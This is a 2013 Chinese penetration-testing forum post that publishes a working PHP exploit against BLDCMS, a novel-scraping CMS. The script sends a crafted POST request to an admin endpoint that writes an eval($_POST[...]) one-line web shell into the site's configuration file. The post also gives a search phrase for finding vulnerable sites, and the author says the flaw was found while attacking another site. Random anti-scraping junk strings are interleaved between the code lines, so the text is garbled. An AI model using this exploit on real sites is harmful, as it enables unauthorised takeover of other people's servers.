中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
3 J% ~% ~7 ?2 [' Z5 k( A9 u2 f
7 O' v* `9 l! u
9 C( E5 l" p9 t
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
' S- u1 J( n6 o0 _. m
' Z# T D5 Q% o# o; u
既然都有人发了 我就把我之前写好的EXP放出来吧
' r. S; b) x0 z) ~
1 Z/ U3 a% t C
view source print?01.php;">
1 H' o: D, U% ?$ c9 Q# B
02.<!--?php
' E" {2 z9 ~ R: x
03.echo "-------------------------------------------------------------------
: Z2 ^' J- e: y0 `. Z
04.
4 D. E/ s* X* _4 T/ P
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
, b4 {2 x6 K: t/ U' T5 J/ A2 I& Q
06.
: q( h1 m U3 T5 j
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
( D1 m6 G2 m; C4 H
08.
- O8 Y% T# p9 a) `
09.QQ:981009941\r\n 2013.3.21\r\n
3 I: c- t9 l6 J9 x0 A
10.
' v" E7 r; {+ |- G' E4 V
11.
* n' _6 J- w" d7 q" g% V; U, B& r3 S. p
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
4 Z* Q& M$ G7 e6 o! }
13.
( V6 _( |3 J$ n# j1 S0 Z( k
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
. h9 X5 J/ @! p) A
15.
2 R- n0 w- x/ H& q- o
16.--------------------------------------------------------------------\r\n";
6 N+ v( m5 W, Y. g$ |4 [
17.$url=$argv[1];
# f% @9 B/ n: D( C4 J9 R( @5 B
18.$dir=$argv[2];
9 h f O! Q, k5 j# j
19.$pass=$argv[3];
/ `( A* J; U. B# L, }7 p
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
7 ^1 \& L7 ^- b
21.if (emptyempty($pass)||emptyempty($url))
7 T! p! b- U1 U/ g1 U' z
22.{exit("请输入参数");}
0 h* J0 W# Y9 w! v$ ]6 l0 f
23.else
1 ]6 J& j+ d, N
24.{
7 Z$ B+ i. b' o6 ~# M
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
c. q8 ^! Y* b( o5 O ^, M
26.
7 C! |9 X* L6 k$ t: w: b
27.al;
! L8 J' s/ ]: q7 v0 ^# @% _
28.$length = strlen($fuckdata);
- p/ I4 A$ l/ W. C7 l. ^) t* A) Z% t
29.function getshell($url,$pass)
, X) Y+ d4 h; ]; T8 K
30.{
5 p" P- N+ [3 L3 H, R K
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
. K4 ]& ~: S& R& l9 V
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
# |' Y8 z$ H M
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
6 g/ a. \* e \0 t6 F: q6 p B- u
34.$header .= "User-Agent: MSIE\r\n";
0 R, ]! Y6 Y4 O9 F" q/ h
35.$header .= "Host:".$url."\r\n";
/ Y" I3 a t" w, Z
36.$header .= "Content-Length: ".$length."\r\n";
3 H& \5 @ W9 N k
37.$header .= "Connection: Close\r\n";
) W# Z a' A. z4 u
38.$header .="\r\n";
0 j; O) y; m1 q+ U5 |3 Q
39.$header .= $fuckdata."\r\n\r\n";
3 [1 z. ~8 W# O: S
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
# X8 g4 q& [, v( I' b
41.if (!$fp)
& F1 i( C) ~1 I* ]; K7 O8 v: L
42.{
, Y/ y, F) _" B7 I0 J; q6 l. R3 n
43.exit ("利用失败:请检查指定目标是否能正常打开");
; c/ c) X1 m+ r' @. R- R
44.}
( o8 W2 s% G; \; G% \/ ^
45.else{ if (!fputs($fp,$header))
* }& y0 A( `9 ?% Z0 c
46.{exit ("利用失败");}
# K2 J7 t) {1 X3 d
47.else
5 W. Y+ _$ }/ Q( p
48.{
# P9 c* J6 s* M9 J% Y
49.$receive = '';
, {* Y; i. @/ D# S) @
50.while (!feof($fp)) {
( C+ w9 K8 p4 I! h8 k
51.$receive .= @fgets($fp, 1000);
9 X y' j; B1 s* x5 q* y5 ^4 S% J
52.}
4 j* l, w0 p; B$ U1 p9 w
53.@fclose($fp);
% |$ A2 X& K+ ]8 b9 x; Q: a
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
2 ?/ Y4 Z, p: t$ h' c% ^
55.
) J% d& i3 c5 w, n. l
56.GPC是否=off)";
. h7 T2 n! O' l2 E6 S z
57.}}
x/ H6 V- a5 W+ z; {1 `
58.}
* b4 T% i9 U! J+ u
59.}
! B( B: Y+ a* T z9 m% A0 z
60.getshell($url,$pass);
( f/ v7 g# }+ a7 o0 {7 J/ _
61.?-->
5 w( J4 G0 L. T% q- x
! |$ J# T/ U( R8 \9 l2 C& t
- p- u9 r) q1 k0 C% Y
8 o( p+ W4 G" b. H0 ~
by 数据流
/ _) ?" r: N5 v! L s
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2